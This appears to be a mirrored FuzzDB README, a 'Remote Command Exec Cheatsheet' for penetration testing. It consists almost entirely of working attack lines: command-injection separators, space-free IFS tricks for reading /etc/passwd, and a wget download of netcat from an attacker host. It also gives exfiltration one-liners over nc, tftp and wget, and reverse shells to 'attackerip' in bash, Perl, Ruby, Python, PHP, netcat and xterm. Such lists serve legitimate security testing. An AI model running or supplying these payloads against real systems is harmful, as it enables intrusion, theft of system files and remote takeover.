ContextQMD
Back to Fuzzdb

README

attack/os-cmd-execution/README.md

latest3.6 KB
Original Source

Remote Command Exec Cheatsheet

Executing Commands

Various ways of separating Commands:

blah;blah2

blah ^ blah 2

blah && blah2

FAIL || X

blah%0Dblah2%0Dblah3

`blah`

`blah & blah2`

Shell commands without spaces

Using Internal Field Separator (IFS):

Test for cmd injection without spaces:

sleep${IFS:0:1}20

Example IFS netcat backdoor without spaces:

{wget,http://attackerip/nc}

{chmod,+x,./nc}

{./nc,-l,-p,1234,-e,/bin/bash}

$IFS shell variable:

cat$IFS/etc/passwd

increment the first +1 to retreive the entire file, line by line

cat$IFS/etc/passwd|tail$IFS-n+1|head$IFS-n+1

Shell Variables:

CMD=$'cat\x20/etc/passwd';$CMD

shell variable, increment through file one line at a time:

increment the first +1 to retreive the entire file, line by line

SP=$'\x20';cat$SP/etc/passwd|tail$SP-n+1|head$SP-n+1

Exfiltrating Files / Data

FTP

Make a new text file, and echo and then redirect to FTP

NC

'nc -e /bin/sh'

NC

'echo /etc/passwd | nc host port'

TFTP

'echo put /etc/passwd | tftp host'

WGET:

'wget --post-file /etc/passwd'

One-Liner Reverse Shells

On the listener

$ nc -l -p 1234 -vvv'

On the remote host...

Bash:

$ bash -i >& /dev/tcp/attackerip/1234 0>&1

$ exec 5<>/dev/tcp/attackerip/1234

$ cat <&5 | while read line; do $line 2>&5 >&5; done

Perl

$ perl -e 'use Socket;$i="attackerip";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl for Windows target perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

$ ruby -rsocket -e'f=TCPSocket.open("attackerip",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Python

$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

$ php -r '$sock=fsockopen("attackerip",1234);exec("/bin/sh -i <&3 >&3 2>&3");' (Assumes TCP uses file descriptor 3. It it doesn't work, try 4,5, or 6)

Netcat

$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip 1234 >/tmp/f

Bash

bash -i >& /dev/tcp/attackerip/1234 0>&1

XTERM

To catch incoming xterm, start an open X Server on your system (:1 - which listens on TCP port 6001) with Xnest:

Xnest :1

Authorize the target IP's connection to you:

Run this OUTSIDE the Xnest:

xterm -display 127.0.0.1:1

Run this INSIDE the spawned xterm on the open X Server

xhost +targetip

Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:

xterm -display attackerip:1

or

DISPLAY=attackerip:0 xterm

It will try to connect back to you, attackerip, on TCP port 6001.

If the xterm path is not within the PATH environment variable, you need to specify its filepath. Solaris path example:

/usr/openwin/bin/xterm -display attackerip:1

More docs: /docs/attack-docs/remote-cmd-exfiltration/